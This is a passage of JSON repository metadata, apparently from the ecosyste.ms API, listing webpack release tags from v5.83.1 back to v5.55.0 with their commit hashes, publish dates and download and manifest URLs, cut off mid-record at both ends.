Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webp